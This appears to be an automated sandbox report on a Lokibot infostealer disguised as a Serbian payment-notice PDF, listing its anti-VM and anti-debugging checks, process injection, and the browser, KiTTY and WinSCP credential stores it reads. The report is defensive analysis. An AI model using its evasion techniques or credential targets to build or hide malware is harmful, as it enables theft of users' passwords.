Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Classification label
Source: classification engine | Classification label: mal100.spyw.evad.winEXE@3/2@0/1
Contains functionality for error logging
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00425D58 GetLastError,FormatMessageA
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 2_1_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges
Contains functionality to check free disk space
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0040896E GetDiskFreeSpaceA
Contains functionality to instantiate COM classes
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00418428 FindResourceA
Creates files inside the user directory
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-58933367-3072710494-194312298-1002\4216a73197943a17d1161a6bdc4512b0_59407d34-c8c5-44df-a766-ba8a11cb1cb0
Creates mutexes
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Mutant created: \Sessions\1\BaseNamedObjects\F7EE0CF1CF93AA2F06F12A09
Parts of this application are using Borland Delphi (probably coded in Delphi)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Reads ini files
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Reads software policies
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Virustotal: Detection: 39%
Sample might require command line arguments
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | String found in binary or memory: Uh/aDd
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe 'C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe'
Source: unknown | Process created: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe 'C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe'
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Process created: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe 'C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe'
Checks if Microsoft Office is installed
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Unpacked PE file: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Unpacked PE file: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0042E988 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042E988
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0045DC48 push 0045DCD5h; ret 0_2_0045DCCD
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00406040 push 0040606Ch; ret 0_2_00406064
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_004460F4 push 00446136h; ret 0_2_0044612E
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_004060FC push 00406128h; ret 0_2_00406120
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0042E240 push 0042E27Eh; ret 0_2_0042E276
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0042C244 push 0042C270h; ret 0_2_0042C268
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0042E2C0 push 0042E2F8h; ret 0_2_0042E2F0
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_004382E8 push 0043830Eh; ret 0_2_00438306
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0042E288 push 0042E2B4h; ret 0_2_0042E2AC
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0043834C push 00438378h; ret 0_2_00438370
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0040E38C push 0040E3B8h; ret 0_2_0040E3B0
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_004744B4 push 00474531h; ret 0_2_00474529
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00436574 push 004365A0h; ret 0_2_00436598
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_004365C4 push 00436607h; ret 0_2_004365FF
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0042E5E4 push 0042E610h; ret 0_2_0042E608
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0043662C push 0043666Fh; ret 0_2_00436667
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_004366E8 push 00436733h; ret 0_2_0043672B
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00436690 push 004366DCh; ret 0_2_004366D4
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0042E790 push 0042E7BCh; ret 0_2_0042E7B4
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0041A814 push ecx; mov dword ptr [esp], ecx 0_2_0041A819
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00422892 push 0042293Fh; ret 0_2_00422937
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00422894 push 0042293Fh; ret 0_2_00422937
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00422944 push 004229D4h; ret 0_2_004229CC
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00414964 push 004149DAh; ret 0_2_004149D2
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_004149DC push 00414A84h; ret 0_2_00414A7C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0044C9EC push 0044CA61h; ret 0_2_0044CA59
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0045E9B4 push ecx; mov dword ptr [esp], edx 0_2_0045E9B8
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0044CA64 push 0044CABDh; ret 0_2_0044CAB5
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_0042CA98 push 0042CAC4h; ret 0_2_0042CABC
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00430A9C push 00430AF5h; ret 0_2_00430AED
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe | Code function: 0_2_00460B64 push 00460B90h; ret 0_2_00460B88

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_00471404 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 0_2_00471404
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_0046E42C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 0_2_0046E42C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_0045862C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 0_2_0045862C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_0042CCD0 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_0042CCD0
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_00458F50 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 0_2_00458F50
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_00471B24 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_00471B24
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_00471BD4 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_00471BD4
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_00457D78 IsIconic,GetCapture, 0_2_00457D78
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_0042E988 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042E988
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_0044C8EC
Found API chain indicative of sandbox detection
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Sandbox detection routine: GetCursorPos, DecisionNode, Sleep graph_0-42855
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe File opened / queried: C:\Windows\system32\drivers\VBoxMouse.sys
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe File opened / queried: C:\Windows\system32\drivers\vmmouse.sys
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe File opened / queried: C:\Windows\system32\drivers\VBoxGuest.sys
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe File opened / queried: C:\Windows\system32\drivers\vmhgfs.sys
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: EndDoc,EndDoc,EndDoc,GetTickCount,GetCursorPos,GetCursorPos,Sleep,GetTickCount,ExitProcess, 0_2_00481200
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 0_2_00470974
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe API coverage: 5.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe TID: 2672 Thread sleep time: -840000s >= -30000s
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_00408788 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_00408788
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_00476F2C FindFirstFileA,GetLastError,FindClose, 0_2_00476F2C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_004052B8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_004052B8
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 2_2_00403D74
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 2_1_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 2_1_00403D74
Contains functionality to query system information
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_004262E8 GetSystemInfo, 0_2_004262E8
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000000.00000002.1757187830.00000000007B0000.00000004.00000020.sdmp Binary or memory string: |@j{C:\Windows\system32\drivers\vmhgfs.sys
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000000.00000002.1757187830.00000000007B0000.00000004.00000020.sdmp Binary or memory string: 9|C:\Windows\system32\drivers\VBoxGuest.syssh
Program exit points
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe API call chain: ExitProcess graph end node graph_0-42865
Queries a list of all running processes
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Process queried: DebugFlags
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Process queried: DebugObjectHandle
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 0_2_0042E988 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042E988
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h] 2_2_0040317B
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 2_1_0040317B mov eax, dword ptr fs:[00000030h] 2_1_0040317B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Code function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap, 2_2_00402B7C
Enables debug privileges
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe Section loaded: unknown target pid: 4276 protection: execute and read and write
May try to detect the Windows Explorer process (often used for injection)
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000002.00000002.2177450224.0000000000DE0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000002.00000002.2177450224.0000000000DE0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000002.00000002.2177450224.0000000000DE0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000002.00000002.2177450224.0000000000DE0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA 0_2_00405470
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: GetLocaleInfoA,GetACP 0_2_0040C940
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: GetLocaleInfoA 0_2_0040B2E0
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: GetLocaleInfoA 0_2_0040B294
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA 0_2_0040557C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: GetLocaleInfoA 0_2_00405D9A
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: GetLocaleInfoA 0_2_00405D9C
Queries the volume information (name, serial number etc.) of a device
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: 0_2_00409D60 GetLocalTime
Contains functionality to query the account / user name
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: 2_2_00406069 GetUserNameW
Contains functionality to query the Windows version
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Code function: 0_2_0045DC48 GetVersion
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match, File source: 00000000.00000002.1759806044.00000000029C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000001.1755498220.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1757511531.0000000002440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2174747266.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe PID: 4276, type: MEMORY
Source: Yara match, File source: Process Memory Space: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe PID: 4676, type: MEMORY
Source: Yara match, File source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.unpack, type: UNPACKEDPE
Tries to harvest and steal PuTTY / WinSCP information (sessions, passwords, etc.)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc.)
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\cert9.db
